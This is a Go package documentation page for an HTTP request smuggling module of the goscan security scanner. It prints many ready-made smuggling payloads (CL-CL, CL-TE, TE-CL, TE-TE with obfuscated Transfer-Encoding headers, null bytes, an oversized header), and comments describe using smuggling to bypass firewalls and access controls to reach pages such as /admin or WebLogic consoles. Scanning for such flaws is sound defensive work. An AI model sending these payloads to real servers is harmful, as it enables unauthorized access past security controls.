Smuggling

package

v1.1.2 Latest Latest Go to latest Published: Apr 17, 2023 License: BSD-3-Clause Imports: 6 Imported by: 0

Details

Valid go.mod file
Redistributable license
Tagged version
Stable version
Learn more about best practices

Repository

github.com/w3security/goscan

Documentation ¶

Index ¶

Variables
func DoCheckSmuggling(szUrl string, szBody string)
func E2EC(s string) string
func GenerateHttpSmugglingPay(szUrl, smugglinUrlPath, secHost string) string
type Base
- func (r *Base) CheckResponse(body string, payload string) bool
- func (r *Base) GetPayloads(t *socket.CheckTarget) *[]string
- func (r *Base) GetTimes() int
- func (r *Base) GetVulType() string
- func (r *Base) New() int
type ClCl
- func NewClCl() *ClCl
type ClTe
- func NewCLTE() *ClTe
- func (r *ClTe) CheckResponse(body string, payload string) bool
- func (r *ClTe) GetTimes() int
type ClTe2
- func NewCLTE2() *ClTe2
- func (r *ClTe2) CheckResponse(body string, payload string) bool
- func (r *ClTe2) GetTimes() int
type Err
- func NewErr() *Err
- func (r *Err) CheckResponse(body string, payload string) bool
type Smuggling
type TeCl
- func NewTECL() *TeCl
- func (r *TeCl) CheckResponse(body string, payload string) bool
- func (r *TeCl) GetPayloads(t *socket.CheckTarget) *[]string
type TeTe
- func NewTETE() *TeTe

Constants ¶

This section is empty.

Variables ¶

View Source

var ClClPayload = []string{`
POST %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
Content-Length: 6
Content-Length: 5

12345GPOST / HTTP/1.1
Host: localhost

`, `POST %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
Content-Length: 0
Content-Length: 109

GET /ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1
Host: localhost
Bla:   Bla:GET /ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1
Host: localhost
Connection: Keep-Alive

`}

View Source

var ClTePayload = []string{`POST %s HTTP/1.1
Host: %s
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded%s
Content-Length: 6
Transfer-Encoding: chunked

0

G`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Connection: Keep-Alive
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Connection: Keep-Alive
Content-Length: 62
Transfer-Encoding: chunked

16
login=xxx&password=xxx
0

GET /404 HTTP/1.1
X-Foo: bar`}

Exploit 跳过权限控制，或者防火墙拦截，走私访问admin POST /home HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 62 Transfer-Encoding: chunked

0

GET /admin HTTP/1.1 Host: vulnerable-website.com Foo: x

1 CL-TE
2 CL-TE-TE HTTP request smuggling, obfuscating the TE header

View Source

var ClTePayload2 = []string{`POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=`}

1 CL-TE 2 CL-TE-TE HTTP request smuggling, obfuscating the TE header

View Source

var ErrPayload = []string{`
POST %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
Content-Length: 6
Content-Length: 5

12345GPOST / HTTP/1.1
Host: localhost

`, `GET %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
X-Something: ` + "\x00" + ` something
X-Foo: Bar
GET /index.html?bar=1 HTTP/1.1
Host: localhost
`, `GET %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
X-Something: ` + "\x00" + ` something
GET http://localhost:7001/ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1`, `GET %s HTTP/1.1
Host: %s%s
X-Something: ` + strings.Repeat("A", 65535) + `
X-Foo: Bar
GET /index.html?bar=1 HTTP/1.1
Host: localhost
`, `GET %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
X-Something: ` + "\x00" + ` something
GET http://localhost:7001/ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1`}

\u0000

View Source

var TeClPayload = []string{`POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Connection: Keep-Alive
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`}

View Source

var TeTePayload = []string{`POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: ` + "\x00" + `chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding:chunked
Transfer-encoding:x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: xchunked
Transfer-encoding : chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: xchunked
Transfer-encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-encoding: 	chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Transfer-encoding: 	chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
 Transfer-encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
 Transfer-encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-encoding : chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-encoding
: chunked
Transfer-encoding
: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`}

Connection: Keep-Alive

Functions ¶

func DoCheckSmuggling ¶

func DoCheckSmuggling(szUrl string, szBody string)

 check HTTP Request Smuggling
   可以利用走私尝试访问，被常规手段屏蔽的路径，例如 weblogic 的页面
  https://portswigger.net/web-security/request-smuggling/finding
  https://hackerone.com/reports/1630668
  https://github.com/nodejs/llhttp/blob/master/src/llhttp/http.ts#L483
  1、每个目标的登陆页面只做一次检测，也就是发现你登陆页面的路径可以做一次检测
  2、每个目标相同上下文的页面只做一次检测，爬虫发现的不同上下文各做一次检测
  szBody 是为了 相同url 相同payload 的情况下，只发一次请求，进行多次判断而设计，Smuggling 的场景通常不存在

 做一次 http
	util.PocCheck_pipe <- &util.PocCheck{
		Wappalyzertechnologies: &[]string{"httpCheckSmuggling"},
		URL:                    finalURL,
		FinalURL:               finalURL,
		Checklog4j:             false,
	}

func E2EC ¶

func E2EC(s string) string

func GenerateHttpSmugglingPay ¶

func GenerateHttpSmugglingPay(szUrl, smugglinUrlPath, secHost string) string

构造走私，用来访问被屏蔽的页面

确认存在走私漏洞后，可以继续基于走私 走以便filefuzz
1、首先 szUrl必须是可访问的 200，否则可能会导致误判
@szUrl 设施走私的目标
@smugglinUrlPath 希望走私能访问到到页面，例如 /console
@secHost 第二段头的host

Types ¶

type Base ¶

type Base struct {
	Payload []string
	Type    string
}

func (*Base) CheckResponse ¶

func (r *Base) CheckResponse(body string, payload string) bool

func (*Base) GetPayloads ¶

func (r *Base) GetPayloads(t *socket.CheckTarget) *[]string

func (*Base) GetTimes ¶

func (r *Base) GetTimes() int

func (*Base) GetVulType ¶

func (r *Base) GetVulType() string

func (*Base) New ¶

func (r *Base) New() int

type ClCl ¶

type ClCl struct {
	Base
}

func NewClCl ¶

func NewClCl() *ClCl

type ClTe ¶

type ClTe struct {
	Base
}

func NewCLTE ¶

func NewCLTE() *ClTe

func (*ClTe) CheckResponse ¶

func (r *ClTe) CheckResponse(body string, payload string) bool

第三个payload 返回404表示ok

func (*ClTe) GetTimes ¶

func (r *ClTe) GetTimes() int

type ClTe2 ¶

type ClTe2 struct {
	Base
}

func NewCLTE2 ¶

func NewCLTE2() *ClTe2

func (*ClTe2) CheckResponse ¶

func (r *ClTe2) CheckResponse(body string, payload string) bool

第2个payload 成功返回表示ok

func (*ClTe2) GetTimes ¶

func (r *ClTe2) GetTimes() int

条件：第一请求都第一段必须是200 第一次请求，第二段压入队列第二次请求接在上面第二段后面，所以无论第二次发送什么，都会得到404，那么表示存在漏洞

type Err ¶

type Err struct {
	Base
}

func NewErr ¶

func NewErr() *Err

func (*Err) CheckResponse ¶

func (r *Err) CheckResponse(body string, payload string) bool

type Smuggling ¶

type Smuggling interface {
	CheckResponse(body string, payload string) bool
	GetPayloads(t *socket.CheckTarget) *[]string
	GetTimes() int
	GetVulType() string
}

接口定义

type TeCl ¶

type TeCl struct {
	Base
}

func NewTECL ¶

func NewTECL() *TeCl

func (*TeCl) CheckResponse ¶

func (r *TeCl) CheckResponse(body string, payload string) bool

func (*TeCl) GetPayloads ¶

func (r *TeCl) GetPayloads(t *socket.CheckTarget) *[]string

type TeTe ¶

type TeTe struct {
	Base
}

func NewTETE ¶

func NewTETE() *TeTe

Source Files ¶

View all Source files

Directories ¶

Path	Synopsis
generate

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL